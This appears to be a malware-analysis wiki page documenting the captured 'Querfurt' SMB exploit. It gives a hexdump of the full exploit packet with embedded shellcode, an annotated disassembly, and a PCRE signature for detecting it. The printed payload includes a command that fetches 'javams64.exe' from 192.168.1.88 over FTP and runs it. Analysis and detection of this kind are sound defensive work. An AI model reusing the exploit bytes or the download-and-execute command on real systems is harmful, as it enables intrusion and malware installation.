[[csni:shellcodes:querfurt]]
 
Trace: home » csni » shellcodes » querfurt
Table of Contents

Querfurt Shellcode

file csni:shellcodes:querfurt:querfurt.bin

Shellcode

raw

hexdump 

00000000  00 00 00 85 ff 53 4d 42  72 00 00 00 00 18 53 c8  |....ÿSMBr.....SÈ|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 37 13  |..............7.|
00000020  00 00 00 00 00 62 00 02  50 43 20 4e 45 54 57 4f  |.....b..PC NETWO|
00000030  52 4b 20 50 52 4f 47 52  41 4d 20 31 2e 30 00 02  |RK PROGRAM 1.0..|
00000040  4c 41 4e 4d 41 4e 31 2e  30 00 02 57 69 6e 64 6f  |LANMAN1.0..Windo|
00000050  77 73 20 66 6f 72 20 57  6f 72 6b 67 72 6f 75 70  |ws for Workgroup|
00000060  73 20 33 2e 31 61 00 02  4c 4d 31 2e 32 58 30 30  |s 3.1a..LM1.2X00|
00000070  32 00 02 4c 41 4e 4d 41  4e 32 2e 31 00 02 4e 54  |2..LANMAN2.1..NT|
00000080  20 4c 4d 20 30 2e 31 32  00 00 00 10 bf ff 53 4d  | LM 0.12....¿ÿSM|
00000090  42 73 00 00 00 00 18 07  c8 00 00 00 00 00 00 00  |Bs......È.......|
000000a0  00 00 00 00 00 00 00 37  13 00 00 00 00 0c ff 00  |.......7......ÿ.|
000000b0  00 00 04 11 0a 00 00 00  00 00 00 00 7e 10 00 00  |............~...|
000000c0  00 00 d4 00 00 80 7e 10  60 82 10 7a 06 06 2b 06  |..Ô...~.`..z..+.|
000000d0  01 05 05 02 a0 82 10 6e  30 82 10 6a a1 82 10 66  |.... ..n0..j¡..f|
000000e0  23 82 10 62 03 82 04 01  00 41 41 41 41 41 41 41  |#..b.....AAAAAAA|
000000f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
000004e0  41 41 41 41 41 41 41 41  41 03 00 23 82 0c 57 03  |AAAAAAAAA..#..W.|
000004f0  82 04 0a 00 90 42 90 42  90 42 90 42 81 c4 54 f2  |.....B.B.B.B.ÄTò|
00000500  ff ff fc e8 46 00 00 00  8b 45 3c 8b 7c 05 78 01  |ÿÿüèF....E<.|.x.|
00000510  ef 8b 4f 18 8b 5f 20 01  eb e3 2e 49 8b 34 8b 01  |ï.O.._ .ëã.I.4..|
00000520  ee 31 c0 99 ac 84 c0 74  07 c1 ca 0d 01 c2 eb f4  |î1À.¬.Àt.ÁÊ..Âëô|
00000530  3b 54 24 04 75 e3 8b 5f  24 01 eb 66 8b 0c 4b 8b  |;T$.uã._$.ëf..K.|
00000540  5f 1c 01 eb 8b 1c 8b 01  eb 89 5c 24 04 c3 31 c0  |_..ë....ë.\$.Ã1À|
00000550  64 8b 40 30 85 c0 78 0f  8b 40 0c 8b 70 1c ad 8b  |d.@0.Àx..@..p.­.|
00000560  68 08 e9 0b 00 00 00 8b  40 34 05 7c 00 00 00 8b  |h.é.....@4.|....|
00000570  68 3c 5f 31 f6 60 56 eb  0d 68 ef ce e0 60 68 98  |h<_1ö`Vë.hïÎà`h.|
00000580  fe 8a 0e 57 ff e7 e8 ee  ff ff ff 65 63 68 6f 20  |þ..Wÿçèîÿÿÿecho |
00000590  6f 70 65 6e 20 31 39 32  2e 31 36 38 2e 31 2e 38  |open 192.168.1.8|
000005a0  38 20 36 31 37 35 31 20  3e 20 6f 26 65 63 68 6f  |8 61751 > o&echo|
000005b0  20 75 73 65 72 20 31 20  31 20 3e 3e 20 6f 20 26  | user 1 1 >> o &|
000005c0  65 63 68 6f 20 67 65 74  20 6a 61 76 61 6d 73 36  |echo get javams6|
000005d0  34 2e 65 78 65 20 3e 3e  20 6f 20 26 65 63 68 6f  |4.exe >> o &echo|
000005e0  20 71 75 69 74 20 3e 3e  20 6f 20 26 66 74 70 20  | quit >> o &ftp |
000005f0  2d 6e 20 2d 73 3a 6f 20  26 64 65 6c 20 2f 46 20  |-n -s:o &del /F |
00000600  2f 51 20 6f 20 26 6a 61  76 61 6d 73 36 34 2e 65  |/Q o &javams64.e|
00000610  78 65 0d 0a 00 42 42 42  42 42 42 42 42 42 42 42  |xe...BBBBBBBBBBB|
00000620  42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42  |BBBBBBBBBBBBBBBB|
*
000008f0  42 42 42 42 42 42 42 42  42 42 42 42 42 23 0a 03  |BBBBBBBBBBBBB#..|
00000900  08 00 f8 0f 01 00 f8 0f  01 23 82 08 39 03 82 04  |..ø...ø..#..9...|
00000910  11 00 43 43 43 43 20 f0  fd 7f 53 56 57 66 81 ec  |..CCCC ðý.SVWf.ì|
00000920  80 00 89 e6 e8 ed 00 00  00 ff 36 68 09 12 d6 63  |...æèí...ÿ6h..Öc|
00000930  e8 f7 00 00 00 89 46 08  e8 a2 00 00 00 ff 76 04  |è÷....F.è¢...ÿv.|
00000940  68 6b d0 2b ca e8 e2 00  00 00 89 46 0c e8 3f 00  |hkÐ+Êèâ....F.è?.|
00000950  00 00 ff 76 04 68 fa 97  02 4c e8 cd 00 00 00 31  |..ÿv.hú..LèÍ...1|
00000960  db 68 10 04 00 00 53 ff  d0 89 c3 56 8b 76 10 89  |Ûh....SÿÐ.ÃV.v..|
00000970  c7 b9 10 04 00 00 f3 a4  5e 31 c0 50 50 50 53 50  |ǹ....ó€^1ÀPPPSP|
00000980  50 ff 56 0c 8b 46 08 66  81 c4 80 00 5f 5e 5b ff  |PÿV..F.f.Ä.._^[ÿ|
00000990  e0 60 e8 23 00 00 00 8b  44 24 0c 8d 58 7c 83 43  |à`è#....D$..X|.C|
000009a0  3c 05 81 43 28 00 10 00  00 81 63 28 00 f0 ff ff  |<..C(.....c(.ðÿÿ|
000009b0  8b 04 24 83 c4 14 50 31  c0 c3 31 d2 64 ff 32 64  |..$.Ä.P1ÀÃ1Òdÿ2d|
000009c0  89 22 31 db b8 90 42 90  42 31 c9 b1 02 89 df f3  |."1Ûž.B.B1ɱ..ßó|
000009d0  af 74 03 43 eb f3 89 7e  10 64 8f 02 58 61 c3 60  |¯t.Cëó.~.d..XaÃ`|
000009e0  bf 20 f0 fd 7f 8b 1f 8b  46 08 89 07 8b 7f f8 81  |¿ ðý....F.....ø.|
000009f0  c7 78 01 00 00 89 f9 39  19 74 04 8b 09 eb f8 89  |Çx....ù9.t...ëø.|
00000a00  fa 39 5a 04 74 05 8b 52  04 eb f6 89 11 89 4a 04  |ú9Z.t..R.ëö...J.|
00000a10  c6 43 fd 01 61 c3 a1 0c  f0 fd 7f 8b 40 1c 8b 58  |ÆCý.aá.ðý..@..X|
00000a20  08 89 1e 8b 00 8b 40 08  89 46 04 c3 60 8b 6c 24  |......@..F.Ã`.l$|
00000a30  28 8b 45 3c 8b 54 05 78  01 ea 8b 4a 18 8b 5a 20  |(.E<.T.x.ê.J..Z |
00000a40  01 eb e3 38 49 8b 34 8b  01 ee 31 ff 31 c0 fc ac  |.ëã8I.4..î1ÿ1Àü¬|
00000a50  38 e0 74 07 c1 cf 0d 01  c7 eb f4 3b 7c 24 24 75  |8àt.ÁÏ..Çëô;|$$u|
00000a60  e1 8b 5a 24 01 eb 66 8b  0c 4b 8b 5a 1c 01 eb 8b  |á.Z$.ëf..K.Z..ë.|
00000a70  04 8b 01 e8 89 44 24 1c  61 c2 08 00 eb fe 43 43  |...è.D$.aÂ..ëþCC|
00000a80  43 43 43 43 43 43 43 43  43 43 43 43 43 43 43 43  |CCCCCCCCCCCCCCCC|
*
00000d20  43 43 23 82 04 20 03 09  00 eb 06 90 90 90 90 90  |CC#.. ...ë......|
00000d30  90 03 82 04 11 00 44 44  44 44 44 44 44 44 44 44  |......DDDDDDDDDD|
00000d40  44 44 44 44 44 44 44 44  44 44 44 44 44 44 44 44  |DDDDDDDDDDDDDDDD|
*
00001140  44 44 44 44 44 44 00 00  00 00 00 00              |DDDDDD......|
0000114c

Analysis 

00000503                 call    loc_54E
00000508                 mov     eax, [ebp+3Ch]
0000050B                 mov     edi, [ebp+eax+78h]
0000050F                 add     edi, ebp
00000511                 mov     ecx, [edi+18h]  ; ecx = Number of Name Pointers
00000514                 mov     ebx, [edi+20h]  ; ebx  = Name Table RVA
00000517                 add     ebx, ebp
00000519
00000519 loc_519:
00000519                 jecxz   short loc_549
0000051B                 dec     ecx
0000051C                 mov     esi, [ebx+ecx*4]
0000051F                 add     esi, ebp
00000521                 xor     eax, eax
00000523                 cdq
00000524
00000524 loc_524:                                ; Calculate Hash of Function Name
00000524                 lodsb
00000525                 test    al, al
00000527                 jz      short loc_530
00000529                 ror     edx, 0Dh
0000052C                 add     edx, eax
0000052E                 jmp     short loc_524   ; Calculate Hash of Function Name
00000530 ; ---------------------------------------------------------------------------
00000530
00000530 loc_530:
00000530                 cmp     edx, [esp+4]
00000534                 jnz     short loc_519
00000536                 mov     ebx, [edi+24h]  ; ebx = Ordinal Table RVA
00000539                 add     ebx, ebp
0000053B                 mov     cx, [ebx+ecx*2] ; get Ordinal for Name
0000053F                 mov     ebx, [edi+1Ch]  ; ebx = Export Address Table RVA
00000542                 add     ebx, ebp
00000544                 mov     ebx, [ebx+ecx*4] ; ebx = RVA of Export Function
00000547                 add     ebx, ebp
00000549
00000549 loc_549:
00000549                 mov     [esp+4], ebx
0000054D                 retn                    ; first time returns to 508, second time
0000054D                                         ; returns to the beginning of WinExec,
0000054D                                         ; which finds a pointer to the batch code
0000054D                                         ; below the shellcode on the stack, after
0000054D                                         ; executing it WinExec returns to ExitThread
0000054E ; ---------------------------------------------------------------------------
0000054E
0000054E loc_54E:
0000054E                 xor     eax, eax
00000550                 mov     eax, fs:[eax+30h]
00000554                 test    eax, eax
00000556                 js      short loc_567
00000558                 mov     eax, [eax+0Ch]
0000055B                 mov     esi, [eax+1Ch]
0000055E                 lodsd
0000055F                 mov     ebp, [eax+8]
00000562                 jmp     loc_572         ; ebp = Base of kernel32
00000567 ; ---------------------------------------------------------------------------
00000567
00000567 loc_567:
00000567                 mov     eax, [eax+34h]
0000056A                 add     eax, 7Ch ; '|'
0000056F                 mov     ebp, [eax+3Ch]
00000572
00000572 loc_572:                                ; ebp = Base of kernel32
00000572                 pop     edi
00000573                 xor     esi, esi
00000575                 pusha
00000576                 push    esi
00000577                 jmp     short loc_586
00000579 ; ---------------------------------------------------------------------------
00000579
00000579 loc_579:                                ; Hash of ExitThread
00000579                 push    60E0CEEFh
0000057E                 push    0E8AFE98h       ; Hash of WinExec
00000583                 push    edi
00000584                 jmp     edi
00000586 ; ---------------------------------------------------------------------------
00000586
00000586 loc_586:
00000586                 call    loc_579
00000586 ; ---------------------------------------------------------------------------
0000058B aEchoOpen192_16 db 'echo open 192.168.1.88 61751 > o&echo user 1 1 >> o &echo ge'
0000058B                 db 't javams64.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q '
0000058B                 db 'o &javams64.exe',0Dh,0Ah,0

shellcode patterns

winexec 

const char *createprocesspcre = 
"\\xE8\\x46\\x00\\x00\\x00\\x8B\\x45\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF\\x8B\\x4F"
"\\x18\\x8B\\x5F\\x20\\x01\\xEB\\xE3\\x2E\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31\\xC0"
"\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24"
"\\x04\\x75\\xE3\\x8B\\x5F\\x24\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1C\\x01"
"\\xEB\\x8B\\x1C\\x8B\\x01\\xEB\\x89\\x5C\\x24\\x04\\xC3\\x31\\xC0\\x64\\x8B\\x40"
"\\x30\\x85\\xC0\\x78\\x0F\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x68\\x08\\xE9"
"\\x0B\\x00\\x00\\x00\\x8B\\x40\\x34\\x05\\x7C\\x00\\x00\\x00\\x8B\\x68\\x3C\\x5F"
"\\x31\\xF6\\x60\\x56\\xEB\\x0D\\x68\\xEF\\xCE\\xE0\\x60\\x68\\x98\\xFE\\x8A\\x0E"
"\\x57\\xFF\\xE7\\xE8\\xEE\\xFF\\xFF\\xFF(.*\\x00)";
 
csni/shellcodes/querfurt.txt · Last modified: 2006/02/17 14:01
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki